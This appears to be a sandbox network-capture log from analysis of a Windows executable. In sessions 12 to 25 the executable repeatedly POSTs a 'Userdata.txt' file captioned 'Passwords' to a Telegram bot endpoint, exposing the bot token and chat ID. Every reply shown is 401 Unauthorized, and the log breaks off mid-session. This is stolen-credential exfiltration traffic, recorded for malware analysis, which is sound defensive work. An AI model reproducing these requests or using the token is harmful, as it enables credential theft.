2025-01-11 02:06:17 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 31 34 30 35 33 35 35 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd33b140535537
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:17 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:17 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:17 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 12
Source IP: 192.168.2.10    Source Port: 49734
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:19 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33c89ef7f87d
    Host: api.telegram.org
    Content-Length: 1090
2025-01-11 02:06:19 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 38 39 65 66 37 66 38 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd33c89ef7f87d
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:19 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:19 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:19 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 13
Source IP: 192.168.2.10    Source Port: 49736
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:21 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33e3cef7ff2f
    Host: api.telegram.org
    Content-Length: 1090
2025-01-11 02:06:21 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 33 63 65 66 37 66 66 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd33e3cef7ff2f
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:21 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:21 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:21 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 14
Source IP: 192.168.2.10    Source Port: 49738
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:22 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33fd9dff96db
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 02:06:22 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 64 39 64 66 66 39 36 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd33fd9dff96db
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:23 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:23 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:23 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 15
Source IP: 192.168.2.10    Source Port: 49740
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:24 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd341dc0addca8
    Host: api.telegram.org
    Content-Length: 1090
2025-01-11 02:06:24 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 64 63 30 61 64 64 63 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd341dc0addca8
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:24 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:24 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:24 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.10 | 49742 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:26 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd343c81d2ea8c
    Host: api.telegram.org
    Content-Length: 1090
2025-01-11 02:06:26 UTC | 1090 | OUT | Data Ascii: --===============8dd343c81d2ea8cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:26 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:26 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:26 UTC | 58 | IN | Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.10 | 49744 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:28 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd345f0111b6e8
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 02:06:28 UTC | 1090 | OUT | Data Ascii: --===============8dd345f0111b6e8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:28 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:28 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:28 UTC | 58 | IN | Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.10 | 49746 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:29 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd348169074dc8
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 02:06:29 UTC | 1090 | OUT | Data Ascii: --===============8dd348169074dc8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:29 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:29 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:29 UTC | 58 | IN | Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.10 | 49748 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:31 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd34a782720438
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 02:06:31 UTC | 1090 | OUT | Data Ascii: --===============8dd34a782720438Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:31 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:31 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:31 UTC | 58 | IN | Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.10 | 49750 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:33 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd34d1471b6fa1
    Host: api.telegram.org
    Content-Length: 1090
2025-01-11 02:06:33 UTC | 1090 | OUT | Data Ascii: --===============8dd34d1471b6fa1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:33 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:33 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:33 UTC | 58 | IN | Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.10 | 49752 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:34 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd34f9a68ce3e0
    Host: api.telegram.org
    Content-Length: 1090
2025-01-11 02:06:34 UTC | 1090 | OUT | Data Ascii: --===============8dd34f9a68ce3e0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:35 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:35 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:35 UTC | 58 | IN | Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.10 | 49754 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:36 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd3526ec8c239e
    Host: api.telegram.org
    Content-Length: 1090
2025-01-11 02:06:36 UTC | 1090 | OUT | Data Ascii: --===============8dd3526ec8c239eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:06:36 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:36 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:36 UTC | 58 | IN | Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 23 | Source IP: 192.168.2.10 | Source Port: 49756 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: 2025-01-11 02:06:38 UTC | Bytes transferred: 270 | Direction: OUT
Data:
  POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd357d60fe315a
  Host: api.telegram.org
  Content-Length: 1090

Timestamp: 2025-01-11 02:06:38 UTC | Bytes transferred: 1090 | Direction: OUT
Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 37 64 36 30 66 65 33 31 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii:
  --===============8dd357d60fe315a
  Content-Disposition: form-data; name="document"; filename="Userdata.txt"
  Content-Type: application/x-ms-dos-executable

  ************************************************************

Timestamp: 2025-01-11 02:06:39 UTC | Bytes transferred: 347 | Direction: IN
Data:
  HTTP/1.1 401 Unauthorized
  Server: nginx/1.18.0
  Date: Sat, 11 Jan 2025 02:06:38 GMT
  Content-Type: application/json
  Content-Length: 58
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2025-01-11 02:06:39 UTC | Bytes transferred: 58 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 24 | Source IP: 192.168.2.10 | Source Port: 49758 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: 2025-01-11 02:06:40 UTC | Bytes transferred: 270 | Direction: OUT
Data:
  POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd35b450780516
  Host: api.telegram.org
  Content-Length: 1090

Timestamp: 2025-01-11 02:06:40 UTC | Bytes transferred: 1090 | Direction: OUT
Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 62 34 35 30 37 38 30 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii:
  --===============8dd35b450780516
  Content-Disposition: form-data; name="document"; filename="Userdata.txt"
  Content-Type: application/x-ms-dos-executable

  ************************************************************

Timestamp: 2025-01-11 02:06:40 UTC | Bytes transferred: 347 | Direction: IN
Data:
  HTTP/1.1 401 Unauthorized
  Server: nginx/1.18.0
  Date: Sat, 11 Jan 2025 02:06:40 GMT
  Content-Type: application/json
  Content-Length: 58
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Timestamp: 2025-01-11 02:06:40 UTC | Bytes transferred: 58 | Direction: IN
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 25 | Source IP: 192.168.2.10 | Source Port: 49760 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8156 | Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: 2025-01-11 02:06:42 UTC | Bytes transferred: 270 | Direction: OUT
Data:
  POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
  Content-Type: multipart/form-data; boundary================8dd35f180510c0b
  Host: api.telegram.org
  Content-Length: 1090

Timestamp: 2025-01-11 02:06:42 UTC | Bytes transferred: 1090 | Direction: OUT
